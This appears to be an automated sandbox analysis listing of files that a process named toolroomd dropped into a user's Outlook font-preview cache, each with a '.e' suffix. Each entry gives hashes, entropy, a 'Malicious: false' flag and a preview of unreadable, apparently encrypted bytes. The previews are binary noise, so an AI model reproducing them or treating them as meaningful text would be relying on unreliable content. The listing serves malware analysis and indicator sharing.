Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1178
Entropy (8bit):	7.313398754530821
Encrypted:	false
SSDEEP:	24:9Aple83OTfRbxEwKwGhq4rVf9oy4dd7o8sePc0m7:9ioflFzGh5f/Od7nNpq
MD5:	0457EA25B4620B21891533EC4852FDB3
SHA1:	56A657DABEB62E4B6F5AA24016501D1AD007374A
SHA-256:	1CABA34E94B7E1AA7B0B2093D433A9DFD56576C350914F481506F9B38C8FFC07
SHA-512:	A7F90E7B3A5B17357BB072FBE69B0FA78C9A3D6968A400D92C36293B8F67C93896AA85B489D8C3B8CFDD9ED210ED50FF1311A2B27E315E4E26D3971FB1FB77CA
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.a..@...,...F....&..D.7....f......>..i.zmbd.6d..k.q.fW..v\,z......b$... ...........j....3.X.o.......\.e8...\.....;..?.'..u..6.-.....Q)T.@.v.....`....0.]..C.m..8....!W.cc7.....dy....~.H..Y...0[cz....B@E.+R].D=m..f.S.P.K..?x.+.2d..v..oH.1;.3.......(....jkto.. T..U........ 6....9\|D..y.......]d.......3.pE.r,...< J.......jH.J..:`...).=n-.\r...,.......S..&N:YD....fWH....oz..\.R..7.....C..\|.....uD...<...?%.BV..s...r..)U...P.D.......8Jp.C:........,?....uh......'.a;.8......a..LI.Q...J..v......i.;..'ST...~nE.l.e7.....Oj.5x(.2!.p../8}M.N...O.WF.\|..e7..@..1.`.4?=...z...<.k....Z:. >.oS...O:..P...@.B?Q....=5...S@.X...f.!.eb7..".....{.r....r.F.A.5..Y..R;..=0I!.Nx......X...).j.....v.J4.:?N...66-9 .Abok...-. _O....7.Q.-P2...x../wX...R.n.C..H...s...........9....S..._..:......i.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MonacoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1202
Entropy (8bit):	7.352698198337547
Encrypted:	false
SSDEEP:	24:EpIItavBWBIpCna/m4Q9L/aEvUHNorH8lOFl82GrnQx7FL6sePc0m7:E2ItavBWBOCp9L9vEEIoCRrQx16Npq
MD5:	D8D83C53F85DBC5FAE097416C6C42E43
SHA1:	0AA3AAB61EAD559CE31E01B8DB64A58C49CE7EE2
SHA-256:	5184FD82AA3733572DB22A542BB133ACE6E7FBAEB4D4DC166E87053D86CF8A41
SHA-512:	C48DCDB797081FB13FB360532E4C1619AE808EB4718B8893DC42AB6652C6B4FBDBFC77CA3967F9761FEDBA8A6CD32492A5E11A29102DBD0AE1CF101305724B41
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a97......>.hR..%...f....#R...g.._......08. .\(..-..vX..... .P.T.l.k.......RZ.H.Uh..d7..-.$x...S....$0j..............Z...R.n.C.v....?..BW6.43.\|......5.I.k.wG5....%.......W..].j1nU...".F...uw.}R.x&...S.O...j...z....H.T.#.......4U$.3......dw.D.\K.........M.ML.!...X..R.hu.~XfM...5.....0.]..o..X!.n.h.%...4........=hjXL.q..U..0\|...m,9;..TKb`...{..;...:V@1..s.....J..e.?.I#X.<#<...pt..R6}E...j...t.f................\.`<....'c.; .x.GK..0-...sjU.3[..n..1.>..t.zD#...8..,J.......B.c......N....8#^B..>..b.yP...Dt..E.Xa..P.c:/G.N.....P.... .p..W... It.+..Lh.$....:].t.........ET.T.Q....&...S.t.I.-0...~@9.O.3...^m.c....&s.....C0...C.....g.R_X.K.5....C{kE..._.....Q.....f{.cAO...S...I..=..[..56..'r...........o.....w...o.oM.w/...^mT....^..h....g.B_......f......%...%....l...QQuw..f...@..i.#..@....Y.).P........U..u.j.1.v:....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Mongolian BaitiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1810
Entropy (8bit):	7.605581603434365
Encrypted:	false
SSDEEP:	48:EBDPPuQ7kpDqwiZDL2j1CWmEF9Od/RNpq:8PP5wiZDyhCe9eRu
MD5:	323F059E0C9B1025D2851EC28703BBD0
SHA1:	2564DC77172578C996E65B0D6282D4CB7E12AA6B
SHA-256:	F5CC43276AF11F3F0B8D6CA34AF39223F050CF4314C09C9609CCA8078C10D0CB
SHA-512:	747C45A7C3471C9429463C3849707E9B72887A9F96EAD96AC44792FFBFC7996FC6C9258C6D32A026A4768364E175D212B45B406CC821AF72516E179992F18BBD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a/.6L!.)C.8.9...."g..n...#.......6.`8..."m..0..>"....E]m.p..R5.H..L..}..N...Av..J....V......J..t2.m1...u<%.n.P.................................t....UWX.f.....p.."FL.......31.`=..$?ISO...........k4...4{).e....?....u...x:.x...{..F<..}........rC.n,....$..`...Q.G..N....1.!.HDpg/.<..!..<.L.......!=:0.-..H..m.R./..JO....~.X........nO.._i.}.....Q.....A!.O.w.a'm.(.x........+.....X...eLZ.....}w..@m.~..Cj\.....U....mw..F...-.....r+.....r\.....5...\|.n6...=.SC..<.hJtD..Y1.iVuh.V.....J.4#. ..hq.n........k,b.k.....!h8.S[.vk......3..M.qy...7.0.8.V....FK..n,t......TE...\|5..u~$dA.`3.._.j#..`;.}..#o.i}..`.7O..U..8Z..jv.=.J.B......_@N..4.j>.G.......B.[..../...z..3.-1.E.h.2.g.?}%..L.AS.l.Y..T.....y.]u.Q4.J@O-z..9..l.....R.i...."..C.2.z......(......y..,....s...9..\|'_s..\|.o..7.CO..7`.r.. .N...hb...).....w.@.).....6m.......9r.{...._..i.hOYF`....y+X=.3..f*B......a.T..a..0.....H..k..@........"X...!;i.5"r.~..E.rR..(

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MshtakanRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1346
Entropy (8bit):	7.447729228581455
Encrypted:	false
SSDEEP:	24:ElfFMbV2ip7Tsh5yA1DiiJvK9K3rQ3f5Msxl94JftOsePc0m7:El1iNsDyA0A/sMO/Npq
MD5:	C75758581FA9D239BDE96752088D6CE3
SHA1:	062A61EC2E92EF2A3E3EA7E2ABB7F7E2E4D7DB2A
SHA-256:	0F25E6A4D4803577F07F7F9DFE507D92BA9416E3A742909548C3EC7DC0DF3709
SHA-512:	7ABE2C901CA750B11F8A425E1A2142DA935E88A0321093EFF41FA437426FBAF7932A8A6FBC831F2595030F47DDF9747517FC6C030403381EE78F8B6C728A3FFD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a3.%..G.,.r.'w.#.{....w....6.H.$h.i.k......F......s..O]]..32..<...z......b.z.....G......#,jiSg..\|..)......uFh#..9.....ol!b.8.Q.......lJ..X.1.!..O')(....g..T.jbT...(.=..guO..%....X0..~\|.AGV.....E.Nn..V+....M..yV..}.j-..S.q/.].........=...f.. r{.cH...'.w?.G-. ..P..G...-,...,f&.S5.6.......+\|.....y+".Z..B....b..E..6G.}.....{.I.....t_..(..._.....b..#F3..q..F.d....U...D.D. +D.]5./....V.v..%.J@..3?..:..#_S..'...%i..Gs.Y.B..~.....].....=.>..@..\E.C......`..7.....y......~0..no_r.\s..m$.a..F...D.`+.....d3.r.$....Z.0w.C.......pp..\|'.k.2.T./........#>..`.../.}#eB.U.......j.t.....g..I.W2_<.p.9O...3.......k......5....!...dp...q.\|w.......JC5.h..Mm..M...d..ssY;..m{.d...'&^."}6..e..+.7/c...L[._..]....."..:....b...)MFRh.&..4..B~k....@.....D\|n.#...fA........j0d.%..=..]..P..K.Z...p...F.X....m....%..."...d.#%..=."`....QBO...B..b.......=..ID....{...<.x...\OuW.V.P.t..3.6F..].C..ac....k....`?..w...pL/.>..D..{

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MunaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	7.143692586669949
Encrypted:	false
SSDEEP:	24:EuW30KLI1burOB3qfbQh7dvraj8KwzEMwy9K13o1dsePc0m7:EtLL+burpk5aj8KwAMfo13ozNpq
MD5:	D7EAB7AC7575DCACFD7B87D8C569D736
SHA1:	B50FA0BCCE6172ABB32F0B39AC0A98702D85875B
SHA-256:	BDCA341D242E06D08C36DA50562AFF4B127F734A7C1E749F10BCEB021E414B91
SHA-512:	AB5BD7FC56CC77162E9AA2CE2AB1393F86046E65A02C07B2756D9BA8887E6EEB76F65BC8F5622CB4E57ADFC6B1C2D012077649393DB0A5B85763C8E0E1E5AE93
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.h..@...../....'.{....u..cz..$.5..K3..8es!.............2[.^.c...b.uL.ko>U-...= .....J.p.C..b.f.u..:`..U....~#2R-.-5"s..}m../ ..p..........@...A.>w...c..h.s....t.-...?.VhB.......8.R.~d...u....h"...6..F....dR]..X5....m.L..Z5d........v.3...U............d.E..h...Q....e.....jlI.5o..=..L..r$.h...O...r...0#Kg..k.2..,..c....q'PB._....b.6.-.b.dw^...14j...........fNrF.8d..R..;...o....xD....ho....wV).?.._....O\|h..e.=.m.r..~E.Q..i...2e\|.......D..[ ...&}.T$.t.}m..8hfU.....{...L. ....l}.b.1..e0./.2....2.aB..R"..'...F......>......P..Y...\|dCxi..x3....#...C.5.$...\|.....2K .H}wg...;...y..`..-....>'..f.Z7.E\.:....k.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Myanmar TextRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1626
Entropy (8bit):	7.543919202211958
Encrypted:	false
SSDEEP:	48:yaDDUBvGBSnym/+Z6R59iGhppyydVOehZNpq:XDSvGB+/GKWGhpzVOehZu
MD5:	2D7EC246111E42A792E70F801B3C548E
SHA1:	6CEE4239ACF8F8A7887E0F568C93D7080FA2989B
SHA-256:	AD48E235064CF7F980578589033A7EA86606741ACDD89F5BE7929699C16352E8
SHA-512:	C7916CE14BE400FAC469F8D6082124FE1E095F8D9F44CE7CCF2B9E741F74AFC113952BB89F7B8E88F289A4AA03A14226678CC334223B47ED10375D9B8FD35058
Malicious:	false
Preview:	.<.\|.....f.A..9.7.,b]....R?..i......0.i .Y.a ..\|.t.G...&v<...O...'..B.R..n.D.a.4.K..3.HB.,s)@%Z.a2X^...V........os...3..G.....!....H.Z...x7.....ko..r8#...R'R...X...P.D........L.X+g..!.$.jw.mO%P.Z.i` 8F.b..ac....N-;..Y.iv.m..N.?!%Zh.../...O.Z....0K....`.LEt.d.....+......Z..v.6a._j.Ty.l..7FQI]C..7....i.c\|...[=..&d@..x.............i-.76FD..9WeIh..n.e..8.p1.....Ss.r.....P..}9...m..E>o...(f,Se.D~?d..0......8...^;&SS.c.B.\|......~x..>.lzZ\|`!.CL.z.U+<....U...Y.Ar.J.Y...c;=ty.L.C.........l...4.=..C....#..x.6.w..8..r.8(.".0..59.qm.J:.....^=%...!A.:r.J..B5/pC.c]...07...@.C.".p...y..g..[..D{...3..^.........L.:@G......D=s`..dK?.#....m.o.7+..>..;.....t..6......iV....j....m}.(..o_..^d.>...&....t,...^..\|T.v....f.Y...5..}.[.ic..-^1.X.V....D1d.....f..&&I.-.}T(......mG..E..n..4I...8N....<..SH..c...s.0.m.b.9...D.C.^>..X....0.....\|r.r1G..r9$E.3..../..JfZv...p...65=..(].y....@....*>..K..Y6...9v....}..}.....:Vd.../X.q.".D..Y......i....^.o.`.z...0...o.YZo.E.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.NadeemRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	7.378542152185229
Encrypted:	false
SSDEEP:	24:E8NdYmHu8DEMIIgLfhwwBhjj6suSWsePc0m7:E+dY4h9ghwwBEsWNpq
MD5:	6DE0FB88C2EEFF011855F3B208AD3423
SHA1:	DE98BB30524E65CF6A030CB48AF621976FDD98E9
SHA-256:	DB93D555C9AE8A4CC37B38416E48DAB952DD74C00F2B0AFED1AC01849E22228B
SHA-512:	A3D7E526CB41B321DA6F3DE21289944186F11E7EA15E8CD54D8F2606244B331C33BB3C64A3C656C138409ED63DF277956414B8F103CF12B8C5EFC1E5773E61C0
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.S\|n........3V.q.$...S(.<.ei0e~........t.&:....Vu/{......%t..x....?.....]KnG.S...~0n...SU].. U8....hd...$d..9.....Vf....)...Hz.+X.1..-.t..`.!Jw.V.s.+E.5b...y.hH.M..EL.X......M.z".x...K1.;N..........Gi..\nU.b=..#..ac.._.%3.....,.F...6.{QwS....8?2R.#9..9..4...FA4=.?.F..."....d.=%...l...=.\%.....kl>.K..b.\F......s.x.;.d..H...qE6.l..dtc....3..m.._.F.....l.P./~BJv[.v^>....m3..&$...A-f.M.$c....!.:.L...n.=..#..........A.7J\...;..(..N.%..U.G"1......3...6$.L......0.h.....{P.....a../v...0........wH.wz.SM..\|..x4Y..7/..m8f..\|..B...QeJq..a.9Dp3....XwO.........)k.5..ET)..;(.....<..B.w..7..3^.B.....?'v>Xx:.p..L...+...._N.....,+.6..N..N.V....+.,#..C..B.6r..(...]3/[...X.k....m...S@.#..e.......C7...I...#.3.Y.p........;.Es.S..9...._pt...$..e..Ys=...S.A.Jx....Amh~iM.s..+....Pzg,.LU'......c........{.XN.AM.C.\...,%PLh.U ..\ec;?..j..q.MKN].V.!..i9!R..C. ....................\.........^./k..`R..V5..jd..ysVT*9.X

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.New Peninim MTRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1602
Entropy (8bit):	7.54971169769517
Encrypted:	false
SSDEEP:	24:EWa4mVeo/v5F62GydkVkv/BfmIR5TksO5guWJ9ZElyluodpkJ0IYVESMsePc0m7:EJso/vvGgkV6BftR578gZEeCuI5tNpq
MD5:	4F7D9F03F495D1E7B168A484E29172E7
SHA1:	69F99ED8562688F82C7F4D6327517FDDC7B73584
SHA-256:	39336E356B93234E62D0FDB8F0D466383806984C180A31E089B490781642C717
SHA-512:	220CEA2861D6360CCFAADC8FA2296B723F0A40311F141F964C8E483884916E265809DFEAF8E776525703B866BD14B0A436D1270D0AB856E691F0B2E3BDC58831
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.Jc..B..!..N..H.sbb.[..m..O...i.._.. tek....\|..3'V.....^..G.....~.....{.2%...............MN....J.L.-.y.N; .qc..+#f... .M.7z'R..Y..\S..j.....j......c.\|-.E..!.j.d.M.P$....m....w.L...A......p........"..K-..L..&X.,.<..9.z[xS^B.\|.}.!.`%...gN..j..U..L.......5.....@{&.0...Os^......G..6..k......ePf....j...[[.94H......k...eT4...m.....h...;..T8.(...s.....#.U..j.\nL..u...m...c].3.B...1=.`u.).....n....4>.......1n..<9. ..K.>.+:.<I^........xe..".]....(A..Ws$7.(T......P.].Y....;rJ...>....o........:......g.=...:$...E.F..:1...m\|..O^Q.=.6_.G........dbX..q......?..I.\|...s.R%U.[R.(.!.....s$..c.k\...,,kku$..U.XhMB.......F..g...k .......8...8..........{,..#..[..@....4....r....f.p.Ub..5.....V.W.7(..kiQ....<.?>.,...'fh.].....z....7B...{@.^....}h..!Qu..Og...'=.H.?0.;+Am...G#n.j*1.5O.jv..yH...?......:.,\|...O...)+...s.....=.`P..e.g..1.....\!.P.._......yh..j..n.>h.O.E.n..m. C..Z..d...,..k.0.n..U..\..Y_.....6....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.NoteworthyLight.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.458916047819442
Encrypted:	false
SSDEEP:	24:EViYV1hBaP/knbFftwm3/B8FRnP4GBzCkQeBNyhWf2r2N4+sePc0m7:EVi6h0P/kbbp8TTBzDQeqAf2iW+Npq
MD5:	BCA93C760A8947E18651E24CD3D2CF3C
SHA1:	E52B80126F9A2FFAF8CD71EDEEA3F69911495993
SHA-256:	161E70DD25178A0E603766107B2075A06CAA8604A3E9C3BB84F9E0F9535D1533
SHA-512:	BA4692FE6B7FC2C69E5682F5C8C7DCCCAF8DED3B2A5788D4909D4C1BE0F8FB839C6446CD84965AEE9D98A552C436A13D26CE8E026D01310069E11CDEAAF78FAD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a`...P..>..N{.9kP:......e..O....{...........7.....w[...!...y.i..-..5.P.,..m...&\|?.....2...q3M......F~.1N...^...d.X6.IU ...1...2+../.....2/@C..C<}B....8.]..?.k.GE.............u..)....J..C-=F........q.2.&\|...m...iq.TtJ..o/.......a....vp.8...H.H.p........9....R..\|.K.P.7Ij...."Za..1..;.o6../.p.(....b,C.'.._....s.......r^x.].V..&.2.q@..8/.~UdN"5..A..r....X.?.d`.m....t..#.....k$..:...\|...(b.....D{..G".D.S.......{..^..P(rT..x.8.O{.l .v..n.S.FB%.wv.._...L}..pp.m......Lc.g.6_.pl.LM.G......A.h....fMo.5.W...C...n..S.W..."?N..F.:......)..u....X.`z.....a.(....E\|.wo.\...6.'.+..\|....{.c.....n .y.<....S.........<...x.p"B1..G-UE.J...}.....i.K?e...W"+.Ag?.p..E.u(.Q..2.-(.AL..^!.w..H..[.:V..&.B.'....`...$.K.,....yf..?8...,.x.ycA..QY..~....J.U.S...UW+..De..r.b...Yb.O]n4"..).....r....k.K.s...d.\|..Hh..[k.94..........Cc7.gZ...v.;a.g................:.]..iz...,$.j.u..&.}!..1#..:...(h,..7....T..`.`..s+.ss8..$.Y9..\.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Noto Nastaliq UrduRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2114
Entropy (8bit):	7.681841643986294
Encrypted:	false
SSDEEP:	48:xSnWSQWiEq697BxOF1U6IfvGxIoSN/FgNpq:EWsiEr97jOF1URVomgu
MD5:	60F037EBC8307664CD5096B91828B8DE
SHA1:	C1C1E50D5374EF13FCCB36086A32DB3C24327E82
SHA-256:	0080FEB07FEF968DBB929D66E97A9422F3A7679D2F95D7B4B9B3B86C01F95349
SHA-512:	A7E848D351EB9E9607E23407A7535EC2803B2012C6E5A6E6D1E84405E16C81BB0C22AE8E36EC036C9D6DB88BA791FAC85AF22C47C7B71819530FD147838A6078
Malicious:	false
Preview:	.<.\|.....f.A.....;HS<9<...1FZdU.x..Q.B.i .Y.a...[...4....t.?q.F....+D.@Q.".h.......F...X.:\.]...L....^.m\|.A.......7.x.3.}.....1u..(....Y..>......[.nr..T.h.....Vf....)...Hz^.......v.dUh..u.....t.L..y>8.h.<......Vf....Z.J6.q'.^...jST.....u..S.59'..../..z.N.,.~...........;.k..\|....3.0.{].p....Y.-.5s..k..!.T...y(=`..U......?Uvt..kA..n....w. .......G.32.~/.2.`.".Q.,..@.G.j]...;.`k.z.....z.l;B.=8lz.k.1.d...1c.".I9..#Ot.......Y.q.(..8uN.....&S.....[.c..g...n:.%.#.!+.`o...t....:..^p.[.....13..jz...%.._m......K.7Ze...r~..Ov.IpC$.CQ..X._e.......... ...\|..p.5.L..D..o.........\...........n.Du.......Qc.....].e4...Tu...p.....D[65.W...H....L........jH..3=.P)].:bB.VRY..z.-...!."`Vg.@.......X.._..v...^...(.)}".m..<.}........d.[.`...<.RR..............[..7...N..;2...XW;Ts...~...u...~.y.....)5S.zaR.O...u.........B.c..\Z..C..y..3....!..8.#...d.....S......x+.].ZL..n:.-...7..].......C..\z........1.0..+M.;.v.CgUB.2%.e\|.....l...I....y....W.k&..F&3...t....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.NyalaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1098
Entropy (8bit):	7.251023806566329
Encrypted:	false
SSDEEP:	24:E8jlOeJ2G6aho7ONh4Q6l84XCLSL8qgXsePc0m7:E8we+mNh4Q6O4XuSL8zNpq
MD5:	0C2B510303F7DC1568BBABED9F362B9A
SHA1:	4F6C6BF9FA81500CF95E4C3403B50F4C7C4A5A44
SHA-256:	7387A8A052173C48B04F0AD5C25F50AFB15CEB41D282E2DE1831353E751BC90C
SHA-512:	2BFD45502D7E620712339527DF14199111E3D639FE052EA7A0C31AE90377CE4E1E442DE67D12E29843BCC7DFC672EB9E699F4C269A7C6EDDB86496B2362B7300
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aQ......a..>..Q,.Q.L...........G...6;.!..V.....9++..<.........&.......P-.0.g.m.....Q{.iK.\|....F..[-.K}.&.^r..0.%..{,.....R.....M.AzB.q&..7.U.G......d..$.R......(n.............T.+.x{....]1.....~.m......0.v-....O:.s3h'.[..F.~.LKA.V.....?.a..9r.Q...>d.nX.aB..rg.D..F..9.........<<hu....d.Vs...R.....a...P;.6J..d..~..R.........S....h.,1..A..8.e..2.........M...3.kX.HA.=t7.-r.MV.0....-...&./\.......tK6.N.C.)...L..~.M.i...Dw...'.PkiG..7..7?T.F.4,.%...g.T..'4. .....6.......+...~.n..[.K.D....iy1..2.Q..Fj9.1.......T..;U&j.._.!......[.{.~rx%.9....B.go...B.nX..l^J..X...-..F...p...M...^.t.O.+..5[UZE..t~....PH83.?..{..>.I#..m.).X..0...jb]..dB....4.s<.Z.....BK\|..e..z.\|.9_.q..(8......".D...WW....;..5.....7........9..S...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.OptimaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1242
Entropy (8bit):	7.342345043569852
Encrypted:	false
SSDEEP:	24:E3cMswLP7V2wINvY3tSQ3JaW2kCv3Qt7Rv9GOXJDSpLS7PWsePc0m7:E3Hs8JGNvY3RnHdVuOXJW4ONpq
MD5:	146B037B154E1171ADE36DF472B5DBC8
SHA1:	6FEC94C875E4F9AA8827A906C94FA628A4B10795
SHA-256:	36589DB7B91E982955E0F00AAC9F60F57CA84C7222DF792672DC07783A72C9C4
SHA-512:	C9DAFB0FF2C177C4DC6645D5BF7415C2B63E605CE3DE93392438C7640F393FF669B4B0602253ABEC86A3433954EF0F2C050FE95FEF2DA08C9B39F90F09A2063D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aJ+B@... .1h....a......A..b0MF.)02...pxTt.b.K....S...@1..n."g.X..j..]..1...IY!......?...rR.+hx.E$....Y..H...\.e8...\.....W.9.a...)..L.%]_.C.)6?R....s.j..:d....\Y.i.D..4V....+...LA.....htK<......'&......1b\|^..x..U..F'.\.Y.&..y!89.@K..!.l....A'.\|.eJ...}....O...'.I...>2...k..[.o...J..>.Is=]E:@B...Jw+.....g...%.(9;..{......Mu.d!<J` .....,..7....@....g=..s...L.u."..W.oK.j/.rW...'m@`..RK3.!...^-.t....[."\..m....i..]...%.]...9kZb....R...:..)..!.o2{2.2kvh.......R...$.....C`.....r..n..k.n....\|.....C&B.T....I\....^... ..Zz....;....E.p..6.....x1....)..-..`..x&...^xdc@M.$.v)%..e..p8\|.~F5I.W..4$....h..?.........}nX4$.<L....:.J!...>".q..%.kl..<..q.(..=...8?...}e.P...)8.........^Ne%....2..0.b..J..p.d..Y...;.Z.=..^g..Z.?..N.wj.....]..DD:.+.:....QY.9..t@<f..,3.......S...A...et&ytfO..o.. .>tj.. 4....1.b._.'.....!]FK....H.;J....E...v..w...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Oriya MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.444243521916847
Encrypted:	false
SSDEEP:	24:EA/t9+uENyDzs8UhWXSXwwLnY3f9NvuTIZyOxjSId6Oz5GcMFp2MY2CsePc0m7:EAScDzsdhzAInYrvvZS+6OzEcYp2XNpq
MD5:	7ECE2E12C626C26CB9D4C5D1A431A117
SHA1:	9AF4A5A5A58FE070131564724AAB8742DE5E43F8
SHA-256:	01009C2E57B9F291BE32B04AA88C46EA6BF25F192902E2F2806074C8B88671D7
SHA-512:	1BB2E2FF8F83FA410BFAF8A3152D71925FD9EBF610EB7BA83E900B2F478FB16BE79EC34A3556CB5D28E4181047AC86DE8BC43CB6849C164D390C4281E308417B
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...s......P&.~....h..U.&..,B0.dH`.M.....'i....j..&..D.O..M....$.$\.Y.q...,.....^......Z^....m.....Ev2V..k..q.m..}$...m.U....l.. .....R#.&.1../l.2.V=0h..z.P......z.v..y..Z.j.#?..Sc.....,...?j..`.^.<:RLJ!............=w.l ....o>.N.f......%]=f.r.)B..$O.M..=.$Y.s..G...~...J..i[.Y.O.#.D...>...uj.=go.$#d.]..bo..J..d'Vq.oC@.8%..#0y[.q.d..a.P.>...P.x..;O...:.E..5.&T.x9...I+.#...U...s.jy+&x....1L[...h.E.O....u...........y\|....k..H.t@.f.L.n.D.3.#)..... .0...X)..j..)^.....p.^..."...{.....mU.>..X.pn\|^..Rapo.W.~.0..s@HC.......{..;.L.@...I..x....JW..!."...i...].....j.E.c0.....].^.P.8...g.^...]n..i.,.q.Q.~..?........./.o...x.........\....`&............Go.....9..............6........USc..#.z..?.!)EOe...y}I.<..4..0.Fu........P.3.=...d6!9'5.7.B.`i)...JP.j..}.D.;.t. ...?.2$..+.D..Kl...Y...E...(.S.uPY...~YTPh..zbN....Hi...R.f1.qJz.Ku`A...'3.....\.t-.^....Ns.Q..&..Ac.....?\|.1p...j3+s.....K.Dy..?4.&..V...Xe5..1:\G....N.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Oriya Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1890
Entropy (8bit):	7.643213063219881
Encrypted:	false
SSDEEP:	48:YuEnreIMVblQZ2n7K/mJt5lLcpJqfXW+rsPnlNmNpq:o6IC3Oeprwbmu
MD5:	0AEB980670BB0318EFDB24D741AB4A5E
SHA1:	2CEB2F1053A3DF3930F73FD75854B7ADB0FDFF73
SHA-256:	459C1CDAFFB02229FB6F108808C72BD023300D67DFF1D86FB226B3DEE239394E
SHA-512:	ECA2FA491D6D82CB8FCB351EB66DD1BD292238309AA6C91379EA898AB8A7F5C537D04DEF8827DDA8DA4CED9BF41295EFB01A451FA3AA5F4CE9CAF0230C5DB877
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.aP.6.n^.]...T.a.......]R..xH ...).^........F..`..t..JO..u.R...V.Q.m...=.d.G)]..0.pz.....~E.R4#...(.I....4.#..Yq.~...Yq.~...Yq.~.U..m...2~.~Z3.K$.,..\.....E....a...6C....7.&/.!{e.N..3..L....>...w.!.02.k...!..u..].O...\.T..n..3...U..F.._y.A.7.$.^....s.-.e..rR^.N._.....C8.S..PJ...V#.`.{J...'.......`.,.)...C^1!B....O.....).-x.-.......8..`%!.!.......R...F\`..aL.:D..@..m.6.....!...q...p.g...@..QR.7...[Wn..<....jS.L..3..9^....w....9.BW\...._...z.A..Dr...rI...S:.\|...pij..D.....(.f...F4..BL.B.s............. z....A..#d....WN.^..).?^.J._..>..`....W...joGa...\..3.0...}?Q..#.QZ.@.x8."F.%.'C....q.1...%.^..c.....t.U...w......../..F.H].2..gc.QA.zc...1.M~.....tTYv...I.U.;..{.T....O_S.;........O..F.Z..p..<9He...v...&.^X,........G...9.!../.F.qo{.."...g.k..P#..6.vh.}MG.R.$V.._.C<.t...;.D.......E...B.X.+e.g&.>..g.$\.a...^.p.;f.^uCo..Qn....R..,_./.Z..r.D.T/..W.)...x...h..z0.V.y....?x...OM.!<.y..:...i.9..v".......

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.PMingLiU-ExtBRegular.png.e Download File
